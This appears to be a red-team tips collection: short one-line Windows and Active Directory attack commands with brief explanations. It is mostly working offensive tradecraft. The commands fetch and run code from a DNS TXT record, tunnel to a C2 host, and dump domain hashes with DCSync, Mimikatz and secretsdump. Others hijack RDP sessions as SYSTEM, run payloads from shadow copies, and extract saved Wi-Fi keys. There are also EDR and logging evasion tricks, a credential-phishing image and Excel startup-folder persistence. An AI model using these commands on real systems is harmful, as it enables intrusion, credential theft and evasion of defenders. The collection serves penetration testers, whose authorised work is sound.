Need to find the domain controllers? nltest /dclist, or nslookup -q=srv _kerberos._tcp (the domain suffix can autocomplete).

ssh c2 -R *:80:localhost:80 to expose a local port on your C2 host. Set GatewayPorts yes in the C2 host's sshd config, otherwise the remote bind on * only listens on loopback.

C:\$Recycle.Bin
tasklist, netstat and wmic process list full | findstr /I commandline for more ideas!

net users /domain? Try using net user /dom.

powershell -encodedcommand? Try powershell -ec.

powershell . (nslookup -q=txt calc.vincentyiu.co.uk)[-1] to fetch a command from a DNS TXT record and run it (the last line of the nslookup output is the record's text).
\\127.0.0.1\c$

net use \\targetip\ipc$ password /u:domain\username, then sc to psexec (create and start a service on the target by hand).

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\malware.exe (or .dll) to run a payload out of a volume shadow copy, then delete the VSC.

systeminfo | findstr /i boot
query user to see who else is connected to the machine.

net use * http://totallylegit.com/share then start z: (mounts the share over WebDAV; net use * takes the next free drive letter, usually Z:).
sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>" then start the service: tscon running as SYSTEM attaches another user's session without their password. Then use putty session.

nslookup -q=srv _ldap._tcp if it's domain joined.

Invoke-Kerberoast

wmic /node:"<computer>" OS get LastBootUpTime in a for loop.

wmic /node:"host" process list brief :) then look at RT #82.

sqldeveloper.exe

script is case sensitive and <registration is case insensitive. <havexhavex> but not <havexDATABLOBhavex>
ping 8.8.8.8 works? Try ICMP tunnelling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll, though it only works on an immature network.

nslookup google.com resolves from inside? You may have a DNS tunnelling problem.

office2john to get the hash and crack it in Hashcat!

Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph: https://github.com/sixdub/DomainTrustExplorer

Replicating Directory Changes rights? dcsync to pull hashes using that account.

secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user!

Save hashcat

sort -t . -k1,1n -k2,2n -k3,3n -k4,4n IPs.txt (the n suffix makes each octet a numeric key; without it 10 sorts before 9) or even cat IPs.txt | sort -V

at.exe b64::[encoded params]
netsh wlan show profile name="ssid" key=clear to read a saved Wi-Fi key in clear text.

rpcping -s 127.0.0.1 -t ncacn_np to leak a hash (the client authenticates over SMB named pipes to the host given by -s).

kill -9 $

ssh -l user target -T (no pty allocated, so the login doesn't show up in who or w).

Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-Csv -NoTypeInformation -Path dns.csv to dump the zone's A records from the DC.
C:\windows\system32\inetsrv\appcmd list site to find IIS bindings.

net view \\fileserv /all to list shares including the hidden admin shares, then try other shares and folders!

<scriptlet> with <package> and add <component id="test"> around the rest. Thx @subTee

msDS-AllowedToDelegateTo HTTP you can exploit to obtain HOST and CIFS as well: the service class in the ticket isn't validated, so a ticket for HTTP/host can be used as HOST/host or CIFS/host.
whoami blocked? Use echo %userprofile% or echo %username%. Or replace echo with anything that reflects the value back in an error, e.g. set.

Get-NetSubnet, Get-NetSite in PowerView, or browse in AD Explorer. Can help find your way :)

WMIC /node:host process call create "cmd /c echo > C:\windows\perfc" (creates the NotPetya kill-switch file on a remote host; Win32_Process.Create needs a real executable, hence cmd /c).
/etc/dhcp/dhclient.conf: remove the gethostname() send line so your box doesn't hand its hostname to the DHCP server, for opsec when you VPN in or have to rock up on site.

rundll32 flagged? Try control (@domchell) and winword /L (@subTee). Change your indicators!

net users /domain flagged? Try out n^eT^1 us^er^s /do (the carets are cmd escapes, so this is net1 users /do).
rundll32.exe a lot? Try copying it to another directory so it runs under a different name and path. http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

lsadump::dcsync /all /csv in Mimikatz to perform DRSUAPI grabbing of all hashes! Nice.

Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! https://github.com/hashcat/kwprocessor Share your ideas!

Get-ACL on SYSVOL. Works for me.

Win32_Product. Querying it makes an event log entry for tons of MsiInstaller sources. Holy crap, this is going on my black list.

%USERPROFILE%\Links\Desktop.lnk
Mimikatz renamed to Mimidogz will bypass common Chinese security products such as 360. :)

Domain user -> public role -> UNC leak -> relay or crack using e.g. Inveigh -> suddenly born as a new man! https://github.com/NetSPI/PowerUpSQL has other cool bits worth noting. I do OS admin to SYSADMIN a lot! https://github.com/NetSPI/PowerUpSQL

[img]url/cat.png[/img] for example. Use https://github.com/vysec/basicAuth and set PNG as a PHP execution extension. Embed that PNG and whenever someone visits the page it will prompt for credentials.

"The supreme art of war is to subdue the enemy without fighting"
goaccess -> apt-get install goaccess. Then goaccess -f /var/log/nginx/access.log. Pretty cool! Now you can see who's hitting your redirector and what they're grabbing at all times in live view. Good for red team dashboards.

zgrep -f doms-filter.txt scans.gz | awk -F'"name":"' '{print $2}' | awk -F'","type' '{print $1}' | tee -a doms-subs.txt to get a nice list of subdomains for every DomLink-recovered associated domain? :)

type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr "name url" | findstr /v "type" to pull the user's Chrome bookmarks. Thank @francisacer1 for the path to Bookmarks.bak :D

https://login.windows.net/companyname.onmicrosoft.com/.well-known/openid-configuration. Not sure why, when I Google Tenant ID, people censor it out when it's publicly accessible without any authentication. Bunch of interesting output from the request anyhow.

(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} to dump every saved Wi-Fi profile with its key in one go.
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f to allow multiple sessions per user on a server. This is useful if you want to log in to the jump host, but that guy's just on it all day long... 😶

c:\users\%username%\appdata\roaming\microsoft\excel\xlstart\ for persistence: whatever you drop there loads whenever Excel starts, and there won't be any macro prompts either because it's a trusted location by default.